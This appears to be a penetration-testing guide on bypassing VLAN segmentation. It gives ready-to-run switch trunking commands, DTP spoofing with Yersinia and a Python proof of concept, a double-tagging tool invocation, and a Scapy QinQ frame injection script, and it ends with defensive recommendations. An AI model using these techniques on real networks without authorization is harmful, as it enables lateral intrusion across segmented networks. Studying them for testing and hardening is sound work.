Lateral VLAN Segmentation Bypass

If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (for further details check https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).

Initially, identification of the specific connected port is required. This can typically be accomplished through CDP messages, or by searching for the port via the include mask.

If CDP is not operational, port identification can be attempted by searching for the MAC address:

SW1(config)# show mac address-table | include 0050.0000.0500

Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10.

SW1# show vlan brief

Transitioning to trunk mode entails entering interface configuration mode:

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently.

Virtual interfaces are then created, assigned VLAN IDs, and activated:

sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

Example for manually setting a static IP address on an interface (VLAN 10):

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.

Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.

Other VLAN-Hopping Techniques (no privileged switch CLI)

The previous method assumes authenticated console or Telnet/SSH access to the switch. In real-world engagements the attacker is usually connected to a regular access port. The following Layer-2 tricks often let you pivot laterally without ever logging into the switch OS:

1. Switch-Spoofing with Dynamic Trunking Protocol (DTP)

Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer claims to be a switch. Crafting a single DTP “desirable” or “trunk” frame converts the access port into an 802.1Q trunk that carries all allowed VLANs.

Yersinia and several PoCs automate the process:

# Become a trunk using Yersinia (GUI)
$ sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking

# Python PoC (dtp-spoof)
$ git clone https://github.com/fleetcaptain/dtp-spoof.git
$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable

Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require vconfig; instead use ip link:

sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up

2. Double-Tagging (Native-VLAN Abuse)

If the attacker sits on the native (untagged) VLAN, a crafted frame with two 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as VLANPWN DoubleTagging.py (2022-2024 refresh) automates the injection:

python3 DoubleTagging.py \
        --interface eth0 \
        --nativevlan 1 \
        --targetvlan 20 \
        --victim 10.10.20.24 \
        --attacker 10.10.1.54

Packet walk-through:

Outer tag (1) is stripped by the first switch because it matches the native VLAN.
Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20.

The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames .

3. QinQ (802.1ad) Stacking

Many enterprise cores support Q-in-Q service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy:

from scapy.all import *
outer = 100      # Service tag
inner = 30       # Customer / target VLAN
payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP()
frame = Dot1Q(type=0x88a8, vlan=outer)/payload
sendp(frame, iface="eth0")

Defensive Recommendations

Disable DTP on all user-facing ports: switchport mode access + switchport nonegotiate.
Change the native VLAN on every trunk to an unused, black-hole VLAN and tag it: vlan dot1q tag native.
Prune unnecessary VLANs on trunks: switchport trunk allowed vlan 10,20.
Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity.
Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.

References

https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
VLANPWN attack toolkit – https://github.com/casterbytethrowback/VLANPWN
Twingate "What is VLAN Hopping?" (Aug 2024) – https://www.twingate.com/blog/glossary/vlan%20hopping

6.1 KiB Raw Blame History Unescape Escape